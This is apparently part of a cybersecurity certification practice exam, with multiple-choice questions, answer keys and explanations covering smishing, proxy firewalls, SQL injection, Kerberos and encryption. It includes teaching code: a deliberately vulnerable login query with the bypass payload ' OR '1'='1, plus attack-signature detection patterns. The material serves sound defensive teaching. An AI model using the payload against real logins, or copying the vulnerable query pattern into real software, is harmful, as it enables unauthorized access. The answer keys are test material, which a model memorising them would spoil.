Organizations implement HTTPS to protect their users, particularly when handling sensitive or regulated data. Enforcing HTTPS across all web pages, including those that do not collect user information, helps prevent mixed-content issues and ensures that all interactions are secure. Additional measures, such as HTTP Strict Transport Security (HSTS), instruct browsers to automatically use secure connections, reducing the risk of downgrade attacks. Regular certificate management, including timely renewal and proper configuration, is critical for maintaining trust and avoiding potential security warnings that could undermine user confidence.

Beyond security, adopting HTTPS also supports regulatory compliance and fosters user trust, signaling that an organization takes data protection seriously. It mitigates common web threats associated with insecure traffic, such as credential theft, session hijacking, and interception of sensitive information. By maintaining a robust HTTPS implementation, organizations can provide a safe browsing environment, preserve the confidentiality and integrity of data, and strengthen overall cybersecurity resilience in an increasingly hostile online environment.

Question 76

Which form of social engineering uses text messages to trick users into revealing information or installing malware?

( A ) Phishing
( B ) Vishing
( C ) Smishing
( D ) Tailgating

Answer: C

Explanation:

Smishing is a type of social engineering attack that specifically targets mobile devices through SMS or text messaging. The term combines “SMS” and “phishing” and represents a method by which attackers attempt to trick users into revealing sensitive information, such as login credentials, financial details, or personal identification data, or into installing malicious software on their devices. Unlike traditional phishing, which typically relies on email as the primary delivery method, or vishing, which uses phone calls to manipulate victims, smishing takes advantage of the immediacy and personal nature of text messages to create a sense of urgency or legitimacy.

In a typical smishing attack, attackers may send messages that appear to come from trusted sources, such as banks, service providers, government agencies, or well-known companies. These messages often contain urgent instructions, such as verifying an account, confirming a payment, or claiming a prize. They may include links to fraudulent websites designed to capture credentials or prompt the recipient to download malicious applications that can compromise device security. Once a user interacts with the message, attackers can gain access to sensitive information, financial accounts, or even control over the device.

Mitigating smishing threats requires a combination of user education, technical controls, and organizational policies. Users should be trained to recognize suspicious messages, avoid clicking unknown links, and verify communications through official channels. Mobile device management (MDM) solutions can help monitor and enforce security policies, while anti-malware applications can detect and block malicious apps or links. Multi-factor authentication provides an additional layer of protection, limiting the impact if credentials are compromised. Organizations should also establish policies that restrict sensitive communications over SMS and encourage verification through secure, trusted channels.
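The kind of automated filtering mentioned above can be illustrated with a toy heuristic: flag messages that pair urgent wording with a link, or that use a URL shortener to hide the destination. The keyword and domain lists here are hypothetical examples chosen for illustration; production filters rely on reputation feeds and machine-learning classifiers rather than static lists.

```python
import re

# Hypothetical indicators for illustration only.
URGENCY = ("verify your account", "act now", "payment suspended", "claim your prize")
SHORTENERS = ("bit.ly", "tinyurl.com", "t.co")

def looks_like_smishing(message: str) -> bool:
    """Flag a text message that combines urgency cues with a link."""
    text = message.lower()
    hosts = re.findall(r"https?://([^/\s]+)", text)
    has_urgency = any(phrase in text for phrase in URGENCY)
    uses_shortener = any(h in SHORTENERS for h in hosts)
    # Urgent wording plus any link is suspicious; a shortened link
    # that hides its destination is suspicious on its own.
    return (has_urgency and bool(hosts)) or uses_shortener
```

A heuristic like this produces false positives and false negatives, which is why it complements, rather than replaces, user training and MDM policy enforcement.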

Proactive awareness and continuous monitoring are essential in combating smishing, as attackers constantly adapt their techniques to exploit human trust and mobile device vulnerabilities. By combining user vigilance, technical defenses, and policy enforcement, both individuals and organizations can reduce the risk of smishing attacks, safeguarding personal data, corporate resources, and overall mobile security against this growing and increasingly sophisticated threat vector.

Question 77

Which type of firewall can inspect traffic at the application layer to enforce more granular security policies?

( A ) Packet-Filtering Firewall
( B ) Stateful Inspection Firewall
( C ) Application Layer Firewall (Proxy Firewall)
( D ) Circuit-Level Gateway

Answer: C

Explanation:

Application layer firewalls, also known as proxy firewalls, are security devices that operate at the application layer, the highest layer of the OSI model, providing an advanced level of inspection and control over network traffic. Unlike traditional packet-filtering firewalls that examine only header information such as source and destination IP addresses and ports, or stateful firewalls that monitor sessions and connection states, application layer firewalls analyze the actual content of the traffic. This deep inspection capability allows them to understand and interpret application-specific protocols, such as HTTP, HTTPS, FTP, SMTP, and others, making it possible to enforce security policies based on the data and commands being transmitted rather than just the network metadata.

By examining the content of application traffic, these firewalls can detect and block malicious payloads, prevent SQL injection attempts, restrict unauthorized applications, and enforce granular rules tied to user behavior or organizational policies. For example, an application layer firewall can allow legitimate HTTP requests to pass while blocking requests containing malicious scripts or sensitive data exfiltration attempts. This functionality is particularly important for web applications, email servers, and other sensitive systems where attacks often exploit specific application vulnerabilities rather than the underlying network infrastructure.
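The content-based allow/block decision described above can be sketched as a naive request inspector. The signatures below are simplified examples; a real application-layer firewall such as ModSecurity with the OWASP Core Rule Set uses far richer, continuously updated rules and parses each protocol properly rather than pattern-matching raw text.

```python
import re

# Simplified signatures for illustration only.
BLOCKED_PATTERNS = [
    re.compile(r"(?i)\bunion\b.*\bselect\b"),  # classic SQL injection probe
    re.compile(r"(?i)<script\b"),              # reflected XSS attempt
    re.compile(r"\.\./"),                      # directory traversal
]

def inspect_request(method: str, path: str, body: str = "") -> str:
    """Return 'allow' or 'block' based on request content, not just headers.

    A packet filter sees only IPs and ports; this function looks at what
    the request actually says, which is the application-layer difference.
    """
    payload = f"{path}\n{body}"
    for pattern in BLOCKED_PATTERNS:
        if pattern.search(payload):
            return "block"
    return "allow"
```

Because the inspector sits between client and server as a proxy, a blocked request never reaches the backend application at all.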

Deployment of application layer firewalls often involves proxying traffic, which introduces an intermediary step between the client and the server. While this can add some latency, the trade-off is a significantly higher level of security and control. Modern implementations can also inspect encrypted traffic by performing TLS/SSL interception, allowing them to detect threats hidden within encrypted sessions. Additionally, these firewalls provide detailed logging and reporting, helping organizations monitor user activity, detect anomalies, and support compliance with regulatory requirements.

Application layer firewalls are a critical component of layered security strategies, enabling organizations to protect sensitive applications, enforce access controls, and mitigate complex attacks that bypass lower-level defenses. By understanding application behavior, monitoring content, and enforcing fine-grained policies, these firewalls ensure that organizations maintain robust protection against sophisticated threats targeting application vulnerabilities, while maintaining visibility over data flows and user interactions. This makes them indispensable in modern network security architectures.

Question 78

Which attack exploits web applications by manipulating input to execute unauthorized commands on a backend system?

( A ) Cross-Site Scripting (XSS)
( B ) SQL Injection
( C ) Directory Traversal
( D ) Cross-Site Request Forgery (CSRF)

Answer: B

Explanation:

SQL Injection (SQLi) is an attack targeting web applications by manipulating input to execute unauthorized SQL commands against a backend database. Unlike XSS, which affects client-side scripts, SQLi targets server-side database logic. Attackers can retrieve sensitive data, modify records, bypass authentication, or escalate privileges. SQLi can be performed through form inputs, URL parameters, or API calls. Prevention strategies include input validation, prepared statements, parameterized queries, stored procedures, and least privilege access for database accounts. Web application firewalls can also provide an additional layer of defense. Regular testing, code reviews, and secure development lifecycle practices help identify and remediate vulnerabilities. SQL injection emphasizes the importance of robust input handling, secure coding, and comprehensive testing to protect sensitive information, maintain system integrity, and prevent attackers from gaining unauthorized access to critical databases or compromising business operations.
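The difference between vulnerable string concatenation and the parameterized queries recommended above can be shown with Python's built-in `sqlite3` module (an in-memory toy schema, chosen only for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(name, password):
    # VULNERABLE: attacker-controlled input is concatenated into the SQL text,
    # so a crafted value can change the query's logic.
    query = f"SELECT * FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None

def login_safe(name, password):
    # SAFE: placeholders keep the input as data; it can never become SQL syntax.
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None

# Classic authentication-bypass payload:
payload = "' OR '1'='1"
print(login_unsafe("alice", payload))  # True  -- password check bypassed
print(login_safe("alice", payload))    # False -- payload treated as a literal string
```

The unsafe version turns the `WHERE` clause into `password = '' OR '1'='1'`, which is always true; the parameterized version compares the password against the literal sixteen-character string the attacker typed, which fails.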

Question 79

Which authentication protocol uses tickets to grant access to services within a network securely?

( A ) RADIUS
( B ) Kerberos
( C ) LDAP
( D ) TACACS+

Answer: B

Explanation:

Kerberos is an authentication protocol that uses tickets to securely grant users access to network services without transmitting passwords over the network. It is designed for centralized authentication in enterprise environments, relying on a trusted Key Distribution Center (KDC) to issue time-limited tickets. RADIUS and TACACS+ focus on network access control, while LDAP primarily provides directory services. Kerberos enhances security by preventing replay attacks, eavesdropping, and unauthorized access. Clients obtain a Ticket-Granting Ticket (TGT) from the KDC, which can then be exchanged for service-specific tickets. Implementation requires synchronized system clocks, strong cryptography, and proper configuration of service accounts. Organizations leverage Kerberos to simplify authentication, enforce least privilege access, and integrate seamlessly with single sign-on solutions. By using tickets and strong encryption, Kerberos reduces password exposure, ensures identity verification, and strengthens the overall security posture of enterprise networks, protecting sensitive resources from unauthorized access.
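The TGT-then-service-ticket flow can be modeled with a deliberately simplified toy. Real Kerberos (RFC 4120) encrypts tickets and negotiates session keys for mutual authentication; this sketch only mimics the trust structure using HMAC signatures, and all key values and names are hypothetical.

```python
import hashlib
import hmac
import json
import time

KDC_KEY = b"kdc-long-term-secret"            # hypothetical KDC key
SERVICE_KEYS = {"fileserver": b"fs-secret"}  # hypothetical service keys

def _sign(key, blob):
    return hmac.new(key, blob, hashlib.sha256).hexdigest()

def issue_tgt(user, lifetime=300):
    """KDC issues a time-limited Ticket-Granting Ticket to an authenticated user."""
    blob = json.dumps({"user": user, "expires": time.time() + lifetime}).encode()
    return blob, _sign(KDC_KEY, blob)

def issue_service_ticket(tgt, service):
    """The KDC validates the TGT, then issues a ticket for a specific service."""
    blob, mac = tgt
    if not hmac.compare_digest(mac, _sign(KDC_KEY, blob)):
        raise PermissionError("forged TGT")
    claims = json.loads(blob)
    if time.time() > claims["expires"]:
        raise PermissionError("TGT expired")
    sblob = json.dumps({"user": claims["user"], "service": service}).encode()
    return sblob, _sign(SERVICE_KEYS[service], sblob)

def service_accepts(ticket, service):
    """The service verifies the ticket with its own key; no password crossed the wire."""
    sblob, mac = ticket
    return hmac.compare_digest(mac, _sign(SERVICE_KEYS[service], sblob))
```

The structure mirrors the real protocol: the user authenticates once to get a TGT, exchanges it for per-service tickets, and each service can verify its own tickets independently, which is what makes Kerberos a natural fit for single sign-on. The expiry field is also why synchronized clocks are a hard requirement.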

Question 80

Which process involves transforming data into a coded form to prevent unauthorized access during storage or transmission?

( A ) Hashing
( B ) Encryption
( C ) Tokenization
( D ) Obfuscation

Answer: B

Explanation:

Encryption is the process of converting plaintext into ciphertext using cryptographic algorithms to protect data from unauthorized access. Unlike hashing, which ensures integrity, or tokenization, which substitutes sensitive data, encryption focuses on confidentiality. Data can be encrypted at rest (stored on devices) or in transit (moving across networks) using symmetric or asymmetric algorithms. Symmetric encryption uses the same key for encryption and decryption, while asymmetric encryption uses paired public and private keys. Encryption ensures that even if data is intercepted or stolen, it remains unreadable without the proper decryption key. Strong key management, secure algorithm selection, and regular updates are crucial for maintaining effective encryption. Encryption is widely used for securing communications, protecting sensitive files, safeguarding cloud storage, and complying with data protection regulations. By implementing encryption, organizations prevent unauthorized disclosure, maintain confidentiality, and strengthen overall cybersecurity posture against evolving threats.
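The symmetric principle, one shared key both encrypts and decrypts, can be illustrated with a toy one-time pad built from the standard library. This is a teaching sketch only: production systems use vetted algorithms such as AES-GCM through audited libraries, and a one-time pad is only sound if the key is truly random, as long as the message, and never reused.

```python
import secrets

def generate_key(length: int) -> bytes:
    """A fresh random key, as long as the message (one-time-pad requirement)."""
    return secrets.token_bytes(length)

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """XOR is its own inverse: applying the same key twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, key))

plaintext = b"card number 4111-1111"
key = generate_key(len(plaintext))

ciphertext = xor_cipher(plaintext, key)   # encrypt: unreadable without the key
recovered = xor_cipher(ciphertext, key)   # decrypt: same key, same operation
print(recovered == plaintext)             # True
```

Contrast this with hashing, which is deliberately one-way and cannot recover the plaintext, and with asymmetric encryption, where the encrypting (public) key differs from the decrypting (private) key. The sketch also shows why key management is crucial: anyone holding `key` can decrypt.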

 
